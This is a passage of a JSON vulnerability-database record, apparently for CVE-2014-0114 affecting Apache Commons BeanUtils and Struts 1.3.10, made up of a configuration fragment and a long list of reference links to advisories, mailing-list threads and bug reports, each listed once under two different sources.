},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:struts:1.3.10:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"1B3872B7-2972-433D-96A1-154FA545B311\"}]}]}],\"references\":[{\"url\":\"http://advisories.mageia.org/MGASA-2014-0219.html\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://apache-ignite-developers.2346864.n4.nabble.com/CVE-2014-0114-Apache-Ignite-is-vulnerable-to-existing-CVE-2014-0114-td31205.html\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://commons.apache.org/proper/commons-beanutils/javadocs/v1.9.2/RELEASE-NOTES.txt\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://lists.fedoraproject.org/pipermail/package-announce/2014-August/136958.html\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://marc.info/?l=bugtraq\u0026m=140119284401582\u0026w=2\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://marc.info/?l=bugtraq\u0026m=140801096002766\u0026w=2\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://marc.info/?l=bugtraq\u0026m=141451023707502\u0026w=2\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://openwall.com/lists/oss-security/2014/06/15/10\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://openwall.com/lists/oss-security/2014/07/08/1\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://seclists.org/fulldisclosure/2014/Dec/23\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://secunia.com/advisories/57477\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://secunia.com/advisories/58710\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://secunia.com/advisories/58851\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://secunia.com/advisories/58947\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://secunia.com/advisories/59014\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://secunia.com/advisories/59118\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://secunia.com/advisories/59228\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://secunia.com/advisories/59245\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://secunia.com/advisories/59246\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://secunia.com/advisories/59430\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://secunia.com/advisories/59464\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://secunia.com/advisories/59479\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://secunia.com/advisories/59480\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://secunia.com/advisories/59704\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://secunia.com/advisories/59718\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://secunia.com/advisories/60177\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://secunia.com/advisories/60703\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg21674128\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg21674812\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg21675266\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg21675387\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg21675689\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg21675898\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg21675972\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg21676091\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg21676110\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg21676303\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg21676375\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg21676931\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg21677110\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg27042296\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://www.debian.org/security/2014/dsa-2940\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://www.ibm.com/support/docview.wss?uid=swg21675496\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://www.mandriva.com/security/advisories?name=MDVSA-2014:095\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://www.securityfocus.com/archive/1/534161/100/0/threaded\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://www.securityfocus.com/bid/67121\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://www.vmware.com/security/advisories/VMSA-2014-0008.html\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://www.vmware.com/security/advisories/VMSA-2014-0012.html\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2018:2669\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2019:2995\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://access.redhat.com/solutions/869353\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://bugzilla.redhat.com/show_bug.cgi?id=1091938\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://bugzilla.redhat.com/show_bug.cgi?id=1116665\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05324755\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://issues.apache.org/jira/browse/BEANUTILS-463\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/0340493a1ddf3660dee09a5c503449cdac5bec48cdc478de65858859%40%3Cdev.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/080af531a9113e29d3f6a060e3f992dc9f40315ec7234e15c3b339e3%40%3Cissues.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/084ae814e69178d2ce174cfdf149bc6e46d7524f3308c08d3adb43cb%40%3Cissues.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/098e9aae118ac5c06998a9ba4544ab2475162981d290fdef88e6f883%40%3Cissues.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/09981ae3df188a2ad1ce20f62ef76a5b2d27cf6b9ebab366cf1d6cc6%40%3Cissues.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/0a35108a56e2d575e3b3985588794e39fbf264097aba66f4c5569e4f%40%3Cuser.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/0efed939139f5b9dcd62b8acf7cb8a9789227d14abdc0c6f141c4a4c%40%3Cissues.activemq.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/1565e8b786dff4cb3b48ecc8381222c462c92076c9e41408158797b5%40%3Ccommits.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/15fcdf27fa060de276edc0b4098526afc21c236852eb3de9be9594f3%40%3Cissues.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5%40%3Cissues.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/2454e058fd05ba30ca29442fdeb7ea47505d47a888fbc9f3a53f31d0%40%3Cissues.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/2ba22f2e3de945039db735cf6cbf7f8be901ab2537337c7b1dd6a0f0%40%3Cissues.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/31f9dc2c9cb68e390634a4202f84b8569f64b6569bfcce46348fd9fd%40%3Ccommits.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3%40%3Cdevnull.infra.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/3f500972dceb48e3cb351f58565aecf6728b1ea7a69593af86c30b30%40%3Cissues.activemq.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/40fc236a35801a535cd49cf1979dbeab034b833c63a284941bce5bf1%40%3Cdev.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/42ad6326d62ea8453d0d0ce12eff39bbb7c5b4fca9639da007291346%40%3Cissues.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/4c3fd707a049bfe0577dba8fc9c4868ffcdabe68ad86586a0a49242e%40%3Cissues.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/65b39fa6d700e511927e5668a4038127432178a210aff81500eb36e5%40%3Cissues.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/66176fa3caeca77058d9f5b0316419a43b4c3fa2b572e05b87132226%40%3Cissues.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/6afe2f935493e69a332b9c5a4f23cafe95c15ede1591a492cf612293%40%3Cissues.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/6b30629b32d020c40d537f00b004d281c37528d471de15ca8aec2cd4%40%3Cissues.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451%40%3Csolr-user.lucene.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/869c08899f34c1a70c9fb42f92ac0d043c98781317e0c19d7ba3f5e3%40%3Cissues.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/88c497eead24ed517a2bb3159d3dc48725c215e97fe7a98b2cf3ea25%40%3Cdev.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/8e2bdfabd5b14836aa3cf900aa0a62ff9f4e22a518bb4e553ebcf55f%40%3Cissues.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/918ec15a80fc766ff46c5d769cb8efc88fed6674faadd61a7105166b%40%3Cannounce.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0%40%3Cissues.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/97fc033dad4233a5d82fcb75521eabdd23dd99ef32eb96f407f96a1a%40%3Cissues.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/9b5505632f5683ee17bda4f7878525e672226c7807d57709283ffa64%40%3Cissues.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/aa4ca069c7aea5b1d7329bc21576c44a39bcc4eb7bb2760c4b16f2f6%40%3Cissues.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/c24c0b931632a397142882ba248b7bd440027960f22845c6f664c639%40%3Ccommits.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c%40%3Ccommits.pulsar.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/c7e31c3c90b292e0bafccc4e1b19c9afc1503a65d82cb7833dfd7478%40%3Cissues.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/cee6b1c4533be1a753614f6a7d7c533c42091e7cafd7053b8f62792a%40%3Cissues.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/d27c51b3c933f885460aa6d3004eb228916615caaaddbb8e8bfeeb40%40%3Cgitbox.activemq.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/df093c662b5e49fe9e38ef91f78ffab09d0839dea7df69a747dffa86%40%3Cdev.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/df1c385f2112edffeff57a6b21d12e8d24031a9f578cb8ba22a947a8%40%3Cissues.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/ebc4f019798f6ce2a39f3e0c26a9068563a9ba092cdf3ece398d4e2f%40%3Cnotifications.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/f3682772e62926b5c009eed63c62767021be6da0bb7427610751809f%40%3Cissues.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/fda473f46e51019a78ab217a7a3a3d48dafd90846e75bd5536ef72f3%40%3Cnotifications.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/ffde3f266d3bde190b54c9202169e7918a92de7e7e0337d792dc7263%40%3Cissues.commons.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3Csolr-user.lucene.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/r458d61eaeadecaad04382ebe583230bc027f48d9e85e4731bc573477%40%3Ccommits.dolphinscheduler.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/r75d67108e557bb5d4c4318435067714a0180de525314b7e8dab9d04e%40%3Cissues.activemq.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55%40%3Csolr-user.lucene.apache.org%3E\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://security.gentoo.org/glsa/201607-09\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://security.netapp.com/advisory/ntap-20140911-0001/\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://security.netapp.com/advisory/ntap-20180629-0006/\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html\",\"source\":\"secalert@redhat.com\"},{\"url\":\"http://advisories.mageia.org/MGASA-2014-0219.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://apache-ignite-developers.2346864.n4.nabble.com/CVE-2014-0114-Apache-Ignite-is-vulnerable-to-existing-CVE-2014-0114-td31205.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://commons.apache.org/proper/commons-beanutils/javadocs/v1.9.2/RELEASE-NOTES.txt\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://lists.fedoraproject.org/pipermail/package-announce/2014-August/136958.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://marc.info/?l=bugtraq\u0026m=140119284401582\u0026w=2\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://marc.info/?l=bugtraq\u0026m=140801096002766\u0026w=2\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://marc.info/?l=bugtraq\u0026m=141451023707502\u0026w=2\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://openwall.com/lists/oss-security/2014/06/15/10\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://openwall.com/lists/oss-security/2014/07/08/1\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://seclists.org/fulldisclosure/2014/Dec/23\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://secunia.com/advisories/57477\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://secunia.com/advisories/58710\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://secunia.com/advisories/58851\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://secunia.com/advisories/58947\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://secunia.com/advisories/59014\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://secunia.com/advisories/59118\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://secunia.com/advisories/59228\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://secunia.com/advisories/59245\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://secunia.com/advisories/59246\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://secunia.com/advisories/59430\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://secunia.com/advisories/59464\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://secunia.com/advisories/59479\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://secunia.com/advisories/59480\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://secunia.com/advisories/59704\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://secunia.com/advisories/59718\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://secunia.com/advisories/60177\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://secunia.com/advisories/60703\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg21674128\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg21674812\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg21675266\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg21675387\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg21675689\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg21675898\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg21675972\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg21676091\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg21676110\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg21676303\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg21676375\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg21676931\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg21677110\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg27042296\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.debian.org/security/2014/dsa-2940\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.ibm.com/support/docview.wss?uid=swg21675496\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.mandriva.com/security/advisories?name=MDVSA-2014:095\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.securityfocus.com/archive/1/534161/100/0/threaded\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.securityfocus.com/bid/67121\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.vmware.com/security/advisories/VMSA-2014-0008.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.vmware.com/security/advisories/VMSA-2014-0012.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2018:2669\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2019:2995\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://access.redhat.com/solutions/869353\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://bugzilla.redhat.com/show_bug.cgi?id=1091938\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://bugzilla.redhat.com/show_bug.cgi?id=1116665\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05324755\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://issues.apache.org/jira/browse/BEANUTILS-463\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/0340493a1ddf3660dee09a5c503449cdac5bec48cdc478de65858859%40%3Cdev.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/080af531a9113e29d3f6a060e3f992dc9f40315ec7234e15c3b339e3%40%3Cissues.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/084ae814e69178d2ce174cfdf149bc6e46d7524f3308c08d3adb43cb%40%3Cissues.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/098e9aae118ac5c06998a9ba4544ab2475162981d290fdef88e6f883%40%3Cissues.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/09981ae3df188a2ad1ce20f62ef76a5b2d27cf6b9ebab366cf1d6cc6%40%3Cissues.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/0a35108a56e2d575e3b3985588794e39fbf264097aba66f4c5569e4f%40%3Cuser.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/0efed939139f5b9dcd62b8acf7cb8a9789227d14abdc0c6f141c4a4c%40%3Cissues.activemq.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/1565e8b786dff4cb3b48ecc8381222c462c92076c9e41408158797b5%40%3Ccommits.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/15fcdf27fa060de276edc0b4098526afc21c236852eb3de9be9594f3%40%3Cissues.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5%40%3Cissues.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/2454e058fd05ba30ca29442fdeb7ea47505d47a888fbc9f3a53f31d0%40%3Cissues.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/2ba22f2e3de945039db735cf6cbf7f8be901ab2537337c7b1dd6a0f0%40%3Cissues.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/31f9dc2c9cb68e390634a4202f84b8569f64b6569bfcce46348fd9fd%40%3Ccommits.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3%40%3Cdevnull.infra.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/3f500972dceb48e3cb351f58565aecf6728b1ea7a69593af86c30b30%40%3Cissues.activemq.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/40fc236a35801a535cd49cf1979dbeab034b833c63a284941bce5bf1%40%3Cdev.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/42ad6326d62ea8453d0d0ce12eff39bbb7c5b4fca9639da007291346%40%3Cissues.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da266